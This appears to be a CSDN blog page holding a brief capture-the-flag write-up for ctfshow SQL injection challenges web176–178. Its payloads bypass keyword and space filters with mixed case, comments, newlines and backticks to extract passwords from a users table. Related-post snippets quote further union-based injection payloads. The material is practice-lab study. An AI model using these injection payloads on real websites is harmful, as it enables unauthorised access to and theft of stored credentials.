CTFSHOW WEB入门 sql注入 web176-

起名字怎么这么难

已于 2022-07-15 22:33:45 修改

阅读量534

点赞数

分类专栏： ctfshow-web入门文章标签： web安全

于 2022-07-15 22:31:09 首次发布

本文链接：https://blog.csdn.net/sinat_41572027/article/details/125813331

版权

ctfshow-web入门专栏收录该内容

7 篇文章 2 订阅

订阅专栏

web176

-1' uNion sElect 1,2,password from ctfshow_user --+

web177

过滤空格

'-1/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user/**/where/**/username='flag

web178

-1'union%0aselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

起名字怎么这么难

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ctfshow-web入门-sql注入-web171

HkD01L的博客

11-22

326

此题为【从0开始学web】系列第一百七十一题此系列题目从最基础开始，题目遵循循序渐进的原则从此题开始的150道题全部为sql注入，准备好了吗？

ctfshow-web入门-sql注入-web172

HkD01L的博客

11-22

402

此题为【从0开始学web】系列第一百七十二题此系列题目从最基础开始，题目遵循循序渐进的原则撸猫为主，要什么flag?

2 条评论您还未登录，请先登录后发表或查看评论

ctfshow web入门 sql注入 过滤注入 web176

sinat_41572027的博客

07-10

191

ctfshow web入门 sql注入 过滤注入 web176

ctfshow_web176~180

qq_38634097的博客

05-29

228

不知道为什么，没有检测出来，看了官方的wp，过滤了select，union的。我的思路是，既然过滤了，先检测过滤了哪些字符，然后避开，我认为这比盲猜靠谱。解题思路：题目说对传入的参数进行了过滤，但是我们不知道过滤了什么，所以第一步我们要先确认过在这里插入图片描述。通过测试发现注释符被过滤了，即–+，#，%23都不可以使用，我们换一种思路，把sql后面的‘闭合。在这里，我们使用burp进行检测。最后我是用万能密码破的。

ctfshow web176-? 的waf(方便对题目差异)

songmoshangchen的博客

05-17

228

function waf($str){ return str_replace('select', 'ctfshow', $str); }function waf($str){ return preg_match('/ /', $str); }function waf($str){ return preg_match('/ |\*/', $str); }function waf($str){ return preg_match('/ |\*|\x09|\x0a|\x0b|\0x

ctfshow-web入门-sql注入（web176-web180）

最新发布

Welcome To Myon'Blog !

08-03

763

闭合后简单判断了下字段数是 3测试联合查询注入，存在关键字的过滤，包括 select 和 union（后面经过测试实际只过滤了 select）回显成功得到表名为 ctfshow_user题目中要求 username!='flag'拿到 flag：ctfshow{4dacb0f6-4795-43f4-8b76-d300234e40b6}

ctfshow-web入门-sql

qq_43618536的博客

07-10

1027

ctfshow-web入门-sql

ctfshow web入门 sql注入做题记录

ashMOB的博客

11-12

1107

ctfshow web入门 sql注入 前言，感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshow sql注入 sql注入的产生： php中对数据库的操作非常简化，只需要一串sql语句的字符串，之后将这个字符串传入mysql_query这个函数就能进行数据库的操作，因而如果对用户传入的参数不进行严格的过滤，或者通过预处理之类的手段严格限制传入的参数，就会造成sql注入漏洞，执行用户自定义的sql语句。 MySQL5注入的一般流程：获取字

ctfshow web入门 sql注入

03-17

SQL注入是一种常见的网络安全漏洞，它通过提交非法的SQL语句来欺骗Web应用程序，访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码，攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...

[CTFSHOW][WEB入门] SQL注入

fallingskies

10-07

1028

web171 参数类型字符型 SQL语句 SELECT 注入方式回显注入查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;"; # 确定回显列数 -1' union select NULL,NULL,NULL--+ # 查询当...

CTFshow web(SQL注入176-179）

csjjjd的博客

02-20

521

发现回显，那就直接改变数字就好，就会返回不同的字段，这里教大家一招，很好用，把数字设置的很大就可以直接找到flag，不用一个个翻找。经过测试发现/**/被过滤，那就换成反引号就好了。很多形式的空格类型被过滤，但是%0c还可以使用。

CTFSHOW-WEB入门-SQL注入

qq_44657899的博客

05-29

9234

文章目录前言web171web172web173web174web175 前言最近发现对sql注入的相关知识点有点生疏和忘记了，做做ctfhshow的sql注入来巩固和学习一些新姿势。 web171 直接union注入即可 # 判断列数 ' order by 3 --+ # 查数据库名 ' union select 1,2,database() --+ # 查表名 ' union select 1,2,concat(table_name) from information_schema.tables

适合小白ctfshow-web入门—sql注入175-248超详细解析！！

2201_75930505的博客

09-12

697

将数据输出到一个文件中，然后访问对应文件: 这是一个UNION查询，它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。（路径是一个常见的用于存放网页文件的目录，通常被称为网页根目录。在许多Web服务器中，这个目录被设置为存放网站的主要文件，因此可以通过浏览器访问。

CTFshow sql注入 上篇(web171-220)

Kradress的博客

03-18

7321

目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结前言师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注

CTFSHOW-WEB入门SQL注入部分(大概是长期更新）

Npceer-一位网安初学者的博客

02-01

595

SQL注入0x01 web 171 不一定会所有题都放上来(懒) 但是我尽量 0x01 web 171 总算是开始刷sql注入题了之前学了但是没写几题也算个纯萌新了所以基础题会细一点也为了加强自己记忆 1,2,3都能回显继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段记得ctfshow_user要加'' 我试了半天不知道

CTFSHOW WEB入门——sql注入

Chur的博客

07-22

4966

ctfshow 靶场 web入门 sql注入系列

CTFshow之web171~180---SQL注入（1）

金帛的博客

06-04

2611

ctfshow，SQL注入的wp

ctfshow web入门 sql注入（持续更新）

Lum1n0us's Blog

07-13

1383

文章目录web171web172web173web174web175web176web177web178 web171 第一题嘛，都是最基础的，单引号闭合，用联合查询注入即可。 1' order by 3-- - -1' union select 1,2,3-- - # 库名是ctfshow_web -1' union select 1,database(),3-- - # 表名是ctfshow_user -1' union select 1,group_concat(table_name),3 fro

CTFshow刷题日记-WEB-SQL注入part1（171-184）

Love&Share

09-19

1160

SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。如果 number 是正数，返回第 number 个字符左边的字符串。